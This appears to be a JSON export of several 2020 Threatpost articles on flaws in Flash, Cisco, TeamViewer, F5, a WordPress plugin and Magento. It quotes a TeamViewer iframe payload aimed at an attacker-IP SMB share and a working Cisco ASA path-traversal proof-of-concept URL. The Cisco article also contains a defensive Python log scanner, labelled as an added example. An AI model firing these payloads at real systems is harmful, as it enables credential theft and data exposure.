However, it\u2019s a critical bug ([CVE-2020-9746](<https://nvd.nist.gov/vuln/detail/CVE-2020-9746>)), and if successfully exploited could lead to an exploitable crash, potentially resulting in arbitrary code execution in the context of the current user, according to Adobe.\n\n\u201cAs is typically the case for Flash Player vulnerabilities, web-based exploitation is the primary vector of exploitation but not the only one,\u201d according to Nick Colyer, senior product marketing manager with Automox, in an email. \u201cThese vulnerabilities can also be exploited through an embedded ActiveX control [[a feature in Remote Desktop Protocol](<https://threatpost.com/trickbot-activex-control-dropper/153370/>)] in a Microsoft Office document or any application that uses the Internet Explorer rendering engine.\u201d\n\nThe issue stems from a NULL pointer-dereference error. This type of issue occurs when a program attempts to read or write to memory with a NULL pointer. Running a program that contains a NULL pointer dereference generates an immediate segmentation fault error.\n\nAffected are versions 32.0.0.433 and earlier of Adobe Flash Desktop Runtime (for Windows, macOS and Linux); Adobe Flash Player for Google Chrome (Windows, macOS, Linux and Chrome OS) and Adobe Flash Player for Microsoft Edge and Internet Explorer 11 (Windows 10 and 8.1).\n\nA patch is available in version 32.0.0.445 across all affected platforms (see below). 
Adobe ranks the patch as a \u201cpriority 2,\u201d meaning that it \u201cresolves vulnerabilities in a product that has historically been at elevated risk\u201d \u2013 however, there are currently no known exploits.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/13130904/adobe-flash-player.png>)\n\nAdobe Flash Player flaw updates\n\nFlash is known to be a favorite target for cyberattacks, particularly for exploit kits, [zero-day attacks](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) and phishing schemes. Of note, [Adobe announced in July 2017](<https://threatpost.com/patched-flash-player-sandbox-escape-leaked-windows-credentials/127378/>) that it plans to push Flash into an end-of-life state, meaning that it will no longer update or distribute Flash Player at the end of this year. In June, with Flash Player\u2019s Dec. 31 kill date quickly approaching, [Adobe said that it will start prompting users](<https://threatpost.com/adobe-prompts-users-to-uninstall-flash-player-as-eol-date-looms/156794/>) to uninstall the software in the coming months.\n\nFlash Player has previously caused headaches for system admins over the past year, with Adobe warning of critical issues that could allow for arbitrary code execution [in February](<https://threatpost.com/adobe-security-update-critical-flash-framemaker-flaws/152782/>) and [in June.](<https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/>)\n\nAdobe recommends that users update their product installations to the latest versions using the instructions referenced in the bulletin. 
As a security best practice, remediation of commonly exploitable or recurring threat vectors is always strongly encouraged, Colyer said.\n\n\u201cFor organizations that cannot remove Adobe Flash due to a business-critical function, it is recommended to mitigate the threat potential of these vulnerabilities by preventing Adobe Flash Player from running altogether via the killbit feature, set a Group Policy to turn off instantiation of Flash objects, or limit trust center settings prompting for active scripting elements,\u201d said Colyer.\n", "cvss3": {}, "published": "2020-10-13T17:46:11", "type": "threatpost", "title": "Critical Flash Player Flaw Opens Adobe Users to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9746"], "modified": "2020-10-13T17:46:11", "id": "THREATPOST:A9A57AE690BD069DB9BBA2CD154B315F", "href": "https://threatpost.com/flash-player-flaw-adobe-rce/160034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:19:01", "description": "Cisco has patched a high-severity flaw in its NX-OS software, the network operating system used by Cisco\u2019s Nexus-series Ethernet switches.\n\nIf exploited, the vulnerability could allow an unauthenticated, remote attacker to bypass the input access control lists (ACLs) configured on affected Nexus switches \u2013 and launch denial-of-service (DoS) attacks on the devices.\n\n\u201cA successful exploit could cause the affected device to unexpectedly decapsulate the IP-in-IP packet and forward the inner IP packet,\u201d according to Cisco\u2019s security advisory, [published on Monday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ipip-dos-kCT9X4>). \u201cThis may result in IP packets bypassing input ACLs configured on the affected device or other security boundaries defined elsewhere in the network.\u201d\n\nThe vulnerability ([CVE-2020-10136](<https://nvd.nist.gov/vuln/detail/CVE-2020-10136>)) stems from the network stack of Cisco\u2019s NX-OS software. 
Specifically, it exists in a tunneling protocol called IP-in-IP encapsulation. This protocol allows IP packets to be encapsulated inside another IP packet. The IP-in-IP protocol on the affected software was accepting IP-in-IP packets from any source \u2014 to any destination \u2014 without explicit configuration between the specified source and destination IP addresses.\n\nAn attacker could exploit this issue by sending a crafted IP-in-IP packet to an affected device. Cisco said that under \u201ccertain conditions,\u201d the crafted packets could cause the network stack process to crash and restart multiple times \u2014 ultimately leading to DoS for affected devices.\n\nSpecifically impacted by the flaw are the Nexus 1000, 3000, 5500, 5600, 6000, 7000 and 9000 series, as well as Cisco Unified Computing System (UCS) 6200 and 6300 Series Fabric Interconnects (see a full list of affected models below). Users can also check whether their version of Cisco NX-OS is impacted using a [checking tool available on Cisco\u2019s advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ipip-dos-kCT9X4>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/02110207/cisco-flaw.png>)\n\nUsers can update to the latest patch, and, \u201cif a device has the ability to disable IP-in-IP in its configuration, it is recommended that you disable IP-in-IP in all interfaces that do not require this feature,\u201d according to a [Tuesday CERT Coordination Center notice](<https://kb.cert.org/vuls/id/636397>). 
\u201cDevice manufacturers are urged to disable IP-in-IP in their default configuration and to require their customers to explicitly configure IP-in-IP as and when needed.\u201d\n\nProof-of-concept (PoC) exploit code was released for the bug by [Yannay Livneh](<https://github.com/CERTCC/PoC-Exploits/tree/master/cve-2020-10136>), who had also discovered the flaw.\n\n\u201cYou can use this code to verify if your device supports default IP-in-IP encapsulation from arbitrary sources to arbitrary destinations,\u201d said Livneh on GitHub. \u201cThe intended use of this code requires at least two more devices with distinct IP addresses for these two devices.\u201d\n\nCisco said it is \u201cnot aware of any public announcements or malicious use of the vulnerability.\u201d The vulnerability ranks 8.6 out of 10 on the CVSS scale, making it high severity.\n\nThe flaw [comes a week after Cisco announced](<https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/>) that attackers were able to compromise its servers, after exploiting two known, critical [SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which is used in Cisco network-tooling products.\n
", "cvss3": {}, "published": "2020-06-02T16:16:31", "type": "threatpost", "title": "Severe Cisco DoS Flaw Can Cripple Nexus Switches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10136", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-02T16:16:31", "id": "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "href": "https://threatpost.com/cisco-dos-flaw-nexus-switches/156203/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-10-15T22:15:33", "description": "Popular remote-support software TeamViewer has patched a high-severity flaw in its desktop app for Windows. If exploited, the flaw could allow remote, unauthenticated attackers to execute code on users\u2019 systems or crack their TeamViewer passwords.\n\nTeamViewer is a proprietary software application used by businesses for remote-control functionalities, desktop sharing, online meetings, web conferencing and file transfer between computers. The recently discovered flaw stems from the Desktop for Windows app ([CVE-2020-13699](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699>)) not properly quoting its custom uniform resource identifier (URI) handlers.\n\nApps need to identify the URIs for the websites they will handle. But because handler applications can receive data from untrusted sources, the URI values passed to the application may contain malicious data that attempts to exploit the app. 
In this specific case, values are not \u201cquoted\u201d by the app \u2013 meaning that TeamViewer will treat them as commands rather than as input values.\n\n\u201cAn attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=\u2019teamviewer10: \u2013play \\\\\\attacker-IP\\share\\fake.tvs\u2019>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,\u201d according [to an advisory](<https://jeffs.sh/CVEs/CVE-2020-13699.txt>) by Jeffrey Hofmann, security engineer at Praetorian, who disclosed the flaw.\n\nTo initiate the attack, the attacker could simply persuade a victim with TeamViewer installed on their system to click on a crafted URL in a website \u2013 an opportunity for attackers to potentially [launch watering-hole attacks](<https://threatpost.com/watering-holes-asian-ethnic-flash-update-decoy/154323/>).\n\nThe URI will then trick the app into creating a connection to an attacker-controlled remote share over the Server Message Block (SMB) protocol. SMB is a network protocol used by Windows-based computers that allows systems within the same network to share files.\n\nAfter a victim\u2019s TeamViewer app initiates the remote SMB share, Windows will then make the connection using NT LAN Manager (NTLM). NTLM uses an encrypted protocol to authenticate a user without transferring the user\u2019s password. NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user\u2019s password.\n\nIn this attack scenario, the NTLM request can then be relayed by attackers using a tool like Responder, according to Hofmann. The Responder toolkit captures SMB authentication sessions on an internal network, and relays them to a target machine. This ultimately grants attackers access to the victim\u2019s machine, automatically. 
It also allows them to capture password hashes, which they can then crack via brute-force.\n\nFortunately for users, while the potential impact of this vulnerability is high, \u201cthe practical impact is low,\u201d Hofmann explained to Threatpost in an email. \u201cSuccessfully performing the attack is difficult and requires user interaction. There are a lot of prerequisites to exploit the vulnerability successfully. Every modern browser except for Firefox URL encodes spaces when handing off to URI handlers which effectively prevents this attack.\u201d\n\nThe flaw ranks 8.8 out of 10.0 on the CVSS scale, making it high severity. TeamViewer versions prior to 15.8.3 are vulnerable, and the bug affects various versions of TeamViewer, including: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 and tvvpn1.\n\nThe issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, said researchers.\n\nIn order to patch the flaw, \u201cWe implemented some improvements in URI handling relating to CVE 2020-13699,\u201d according to TeamViewer in a [statement sent to Threatpost](<https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448>). \u201cThank you, Jeffrey Hofmann with Praetorian, for your professionalism and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.\u201d\n\nIn a [security advisory regarding the flaw](<https://www.cisecurity.org/advisory/a-vulnerability-in-teamviewer-cloud-allow-for-offline-password-cracking_2020-106/>), the Center for Internet Security (CIS) recommended that TeamViewer users apply the appropriate patches. 
They also recommended that users avoid untrusted websites or links provided by unknown sources, and \u201ceducate users regarding threats posed by hypertext links contained in emails or attachments, especially from untrusted sources.\u201d\n\nTeamViewer\u2019s remote control functionalities make it a lucrative attack target for bad actors \u2013 especially with more enterprises turning to [collaboration apps like TeamViewer](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) during the pandemic. In 2019, a targeted, email-borne attack against embassy officials and government finance authorities globally [weaponized TeamViewer](<https://threatpost.com/teamviewer-attacks-state-department/144014/>) to gain full control of the infected computer. And earlier in 2020, [a newly discovered variant](<https://threatpost.com/cerberus-trojan-major-spyware-targeted-attack/155415/>) of the Cerberus Android trojan was discovered with vastly expanded and more sophisticated info-harvesting capabilities, and the ability to run TeamViewer.\n
", "cvss3": {}, "published": "2020-08-10T15:56:13", "type": "threatpost", "title": "TeamViewer Flaw in Windows App Allows Password-Cracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-13699", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-08-10T15:56:13", "id": "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "href": "https://threatpost.com/teamviewer-fhigh-severity-flaw-windows-app/158204/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:17:15", "description": "Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks\u2019 networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.\n\nLast week, F5 Networks issued urgent patches for the critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company\u2019s BIG-IP app delivery controllers, which are used for various networking functions, including app-security management and load-balancing. Despite a patch being available, Shodan [shows](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) almost 8,500 vulnerable devices are still available on the internet.\n\nNot long after the flaw was disclosed, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers and ultimately active exploits. 
Researchers warn that they\u2019ve seen attackers targeting the flaw over the weekend for various malicious activities, including launching [Mirai variant DvrHelper](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), deploying cryptocurrency mining malware and [scraping credentials](<https://twitter.com/GossiTheDog/status/1279856862888898568>) \u201cin an automated fashion.\u201d\n\nRich Warren, principal security consultant for NCC Group, [said Monday on Twitter](<https://twitter.com/buffaloverflow/status/1279384540847489024>) that \u201cas of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python.\u201d\n\n> Ok, we are seeing active exploitation of CVE-2020-5902\n> \n> Patch it today\n> \n> \u2014 Rich Warren (@buffaloverflow) [July 4, 2020](<https://twitter.com/buffaloverflow/status/1279384540847489024?ref_src=twsrc%5Etfw>)\n\nThe exploit of the flaw is trivial: Mikhail Klyuchnikov with Positive Technologies, [who originally discovered the flaw](<https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/>), said that in order to exploit the vulnerability, an unauthenticated attacker would only need to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.\n\n\u201cBy exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE),\u201d Klyuchnikov said. 
\u201cThe attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network.\u201d\n\n[Vulnerable versions of BIG-IP](<https://support.f5.com/csp/article/K52145254>) (11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated to the corresponding fixed versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4), he said.\n\nAs more active exploits are detected in the wild, [F5 Networks](<https://twitter.com/F5Networks/status/1279022116868960257>), the [U.S. Cyber Command](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) and [Chris Krebs](<https://twitter.com/CISAKrebs/status/1279939623062581251>), director at the U.S. Cybersecurity and Infrastructure Security Agency (CISA), have all urged administrators to implement the offered fixes as soon as possible.\n\nAnother flaw was also fixed last week in BIG-IP that could allow an authenticated attacker to launch cross-site scripting attacks. The flaw ([CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>)) allows attackers to run malicious JavaScript code as a logged-in user.\n\nF5 Networks previously [dealt with security issues](<https://threatpost.com/authentication-bypass-bug-enterprise-vpns/143781/>) in 2019 when its VPN app (as well as ones built by Cisco, Palo Alto Networks and Pulse Secure) was discovered to improperly store authentication tokens and session cookies without encryption on a user\u2019s computer.\n
", "cvss3": {}, "published": "2020-07-06T19:06:20", "type": "threatpost", "title": "Admins Urged to Patch Critical F5 Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-06T19:06:20", "id": "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "href": "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:17", "description": "A high-severity vulnerability in Cisco\u2019s network security software could lay bare sensitive data \u2013 such as WebVPN configurations and web cookies \u2013 to remote, unauthenticated attackers.\n\nThe flaw exists in the web services interface of Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,\u201d according to a [Wednesday advisory from Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86>). 
\u201cA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\u201d\n\nThe vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)), which ranks 7.5 out of 10 on the CVSS scale, is due to a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the flaw allows a directory traversal attack: a crafted request carries path sequences such as \u201c../\u201d in a URL parameter, and because the device does not strip or reject them, the web server resolves the path outside the directory it intended to expose and returns a file it should never serve. In this case the reachable files are confined to the web services file system, so the impact is disclosure, not code execution.\n\n\u201cThis vulnerability\u2026 is highly dangerous,\u201d said Mikhail Klyuchnikov of Positive Technologies, who was credited with independently reporting the flaw (along with Ahmed Aboul-Ela of RedForce), in a statement provided to Threatpost. \u201cThe cause is a failure to sufficiently verify inputs. An attacker can send a specially crafted HTTP request to gain access to the file system (RamFS), which stores data in RAM.\u201d\n\nA potential attacker can view files within the web services file system only. The web services file system is enabled for specific WebVPN and AnyConnect features (outlined in Cisco\u2019s advisory). The web services files that the attacker can view may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. 
However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\nTo eliminate the vulnerability, Klyuchnikov urged Cisco users to update Cisco ASA to the most recent version. Cisco said it\u2019s not aware of any malicious exploits for the vulnerability \u2013 however, it is aware of proof-of-concept (POC) exploit code [released Wednesday](<https://twitter.com/aboul3la>) by security researcher Ahmed Aboul-Ela.\n\n> Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\n> \n> For example to read \"/+CSCOE+/portal_inc.lua\" file.\n> \n> https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n> \n> Happy Hacking! [pic.twitter.com/aBA3R7akkC](<https://t.co/aBA3R7akkC>)\n> \n> \u2014 Ahmed Aboul-Ela (@aboul3la) [July 22, 2020](<https://twitter.com/aboul3la/status/1286012324722155525?ref_src=twsrc%5Etfw>)\n\nEarlier in May, Cisco stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) across its ASA and FTD network security products. 
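The request quoted in the proof of concept above is easy to spot once the URL is percent-decoded. The following Python is an added example for this article, not code from Cisco, Threatpost or the researcher: a small log-review check that flags requests under the /+CSCOT+/ handler tree whose query values contain a traversal sequence or point at the +CSCOE+ tree, decoding repeatedly so double-encoded variants are caught. It assumes access logs in Apache/nginx combined format from a reverse proxy or WAF in front of the WebVPN portal; the log lines embedded in the block are constructed for the example.

```python
"""Flag web requests that match the CVE-2020-3452 file-read pattern.

Added example for this article, not code from Cisco, Threatpost or the
researcher who published the proof of concept. It is a log-review
heuristic: run it over access logs from a reverse proxy or WAF in front
of an ASA/FTD WebVPN portal (assumption: logs are in Apache/nginx
"combined" format). The sample log lines at the bottom are constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# The public PoC requests /+CSCOT+/translation-table; the check below
# applies to any request under the /+CSCOT+/ handler tree.
CSCOT_PREFIX = "/+CSCOT+/"
TRAVERSAL = re.compile(r"\.\.[/\\]")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (catches %252e%252e%252f)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_cve_2020_3452_probe(url: str) -> bool:
    """True if the request looks like the CVE-2020-3452 traversal.

    The PoC points textdomain at a file under +CSCOE+ and sets lang to
    '../'. Any /+CSCOT+/ request whose decoded query values carry a
    traversal sequence or name the +CSCOE+ tree is reported.
    """
    parts = urlsplit(url)
    if not fully_decode(parts.path).startswith(CSCOT_PREFIX):
        return False
    # Split the query by hand: parse_qs would turn a literal '+' into a
    # space and hide the '+CSCOE+' marker.
    for pair in parts.query.split("&"):
        _, _, raw_value = pair.partition("=")
        value = fully_decode(raw_value)
        if TRAVERSAL.search(value) or "+CSCOE+" in value:
            return True
    return False


def scan_access_log(lines):
    """Return (client_ip, url) for each log line that matches the probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cve_2020_3452_probe(m.group("url")):
            hits.append((m.group("ip"), m.group("url")))
    return hits


# Constructed sample: the first and last lines are probes (the last one
# double-encoded), the middle two are ordinary portal traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jul/2020:10:01:12 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jul/2020:10:01:30 +0000] "GET /+CSCOT+/translation-table'
    '?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 812',
    '203.0.113.5 - - [23/Jul/2020:10:02:05 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 3011',
    '192.0.2.9 - - [23/Jul/2020:10:03:44 +0000] "GET /%2bCSCOT%2b/translation-table'
    '?type=mst&textdomain=x&lang=%252e%252e%252f HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, url in scan_access_log(SAMPLE_LOG):
        print(f"possible CVE-2020-3452 probe from {ip}: {url}")
```

Treat a hit as a probe worth checking against the device's software version and the advisory, not as proof of compromise: a request that drew a 404 still shows someone tested for the bug, while a 200 with a sizeable body on a translation-table request is the case to escalate.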
Those 12 flaws could be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "cvss3": {}, "published": "2020-07-23T19:49:49", "type": "threatpost", "title": "Cisco Network Security Flaw Leaks Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452", "CVE-2020-5135"], "modified": "2020-07-23T19:49:49", "id": "THREATPOST:C51D2F2366676BB018956D93916AC33E", "href": "https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:22:53", "description": "Two vulnerabilities \u2013 including a high-severity flaw \u2013 have been patched in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to inject malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\n[Popup Builder](<https://wordpress.org/plugins/popup-builder/>) helps users create and manage popups \u2013 such as marketing or promotional notices \u2013 for their websites. This week, software development company Sygnoos, the owner of Popup Builder, issued a patch addressing several vulnerabilities in the plugin.\n\n\u201cThese flaws have been patched in version 3.64.1 and we recommend that users update to the latest version available immediately,\u201d according to researchers with [Wordfence, on Thursday](<https://www.wordfence.com/blog/2020/03/vulnerabilities-patched-in-popup-builder-plugin-affecting-over-100000-sites/>). 
\u201cWhile we have not detected any malicious activity targeting Popup Builder, the stored XSS vulnerability can have a serious impact on site visitors and potentially even allow site takeover.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe more severe vulnerability (CVE-2020-10196) stems from a stored cross-site scripting (XSS) flaw in an AJAX hook used by the WordPress plugin. In WordPress plugin development, developers have the ability to register AJAX hooks, which allows them to call functions directly. However, in this specific plugin, the AJAX hook was available to unprivileged users, and it lacked nonce checks or capability checks for the functions called.\n\n\u201cThis meant that an unauthenticated attacker could send a POST request to wp-admin/admin-ajax.php with an array parameter, \u2018allPopupData\u2019, containing a number of key-value pairs, including a popup\u2019s ID (visible in the page source) and a malicious JavaScript payload, which would then be saved in that popup\u2019s settings and executed whenever a visitor navigated to a page where the popup was displayed,\u201d said researchers.\n\nWhile attackers typically use a vulnerability like this to redirect site visitors to [malvertising sites](<https://threatpost.com/wordpress-plugin-flaws-exploited-in-ongoing-malvertising-campaign/146629/>) or steal sensitive information from their browsers, researchers say that the flaw could also be exploited for site takeover if an administrator visited or previewed a page containing the infected popup while logged in.\n\nThe bug ranks 8.3 out of 10.0 on the CVSS severity scale. Version 3.63 of the plugin is affected; researchers urge users to update to version 3.64.1.\n\nPopup Builder also has another medium-severity vulnerability (CVE-2020-10195) that could be exploited by subscribers (users who are logged in, but with minimal permissions). 
Researchers said that by sending a POST request to admin-post.php (with the \u2018action\u2019 parameter set to \u2018sgpbSaveSettings\u2019 and the \u2018sgpb-user-roles[]\u2019 parameter set to \u2018subscriber\u2019), an attacker could grant all subscriber-level users a number of permissions related to the plugin\u2019s functionality.\n\n\u201cIn addition to granting access to create and manage categories and newsletters, this would allow an attacker to make use of other AJAX functions that were protected by nonces, but not by capability checks, since usable nonces were displayed on these pages,\u201d said researchers. \u201cAlternatively, a $_POST request could be sent to admin-post.php with the \u2018action\u2019 parameter set to \u2018csv_file\u2019, making it possible to export a list of newsletter subscribers. As a result, an attacker could gain access to sensitive newsletter subscriber information and use this during a social engineering attack against those subscribers.\u201d\n\nEarlier this week, a [critical vulnerability](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) was found in a WordPress plugin known as \u201cThemeREX Addons\u201d that could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day. And earlier this month, researchers warned that active exploits were targeting a recently patched flaw in the popular [WordPress plugin Duplicator](<https://threatpost.com/active-attacks-duplicator-wordpress-plugin/153138/>), which has more than 1 million active installations. So far, researchers have seen 60,000 attempts to harvest sensitive information from victims.\n\n**_Interested in security for the Internet of Things and how 5G will change things? 
Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-13T20:53:31", "type": "threatpost", "title": "WordPress Plugin Bug in Popup Builder Threatens 100K Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10195", "CVE-2020-10196", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-13T20:53:31", "id": "THREATPOST:023426685093FC21F8E5A7DE88AAB901", "href": "https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:29:14", "description": "The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.\n\nWhile the company didn\u2019t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the [Magecart association of threat groups](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>), which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. 
The scripts steal unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nThe vulnerability ([CVE-2019-8144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8144>)), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant\u2019s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.\n\nThe flaw affects Magento 2.3, and was patched in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, [released in October](<https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update>). The company warned that patching will have the side effect of \u201cblocking administrators from viewing previews for products, blocks and dynamic blocks\u201d; but, it said, it will re-enable the preview functionality as soon as possible.\n\n\u201cWe recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,\u201d Piotr Kaminski of the Magento security team wrote [in a posting](<https://magento.com/security/patches/latest-magento-security-update-helps-protect-recently-reported-rce-vulnerability>) on Monday. 
\u201cApplying this hot fix or upgrading\u2026will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.\u201d\n\nThe same update patches several other critical remote code-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (XSS) issues.\n\nThe warning comes as Magecart activity and infrastructure continue to saturate the web. According to [analysis from RiskIQ](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart\u2019s JavaScript skimming code, with over 18,000 e-commerce hosts directly breached.\n\n\u201cIt is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,\u201d said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. \u201cAs a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.\u201d\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? 
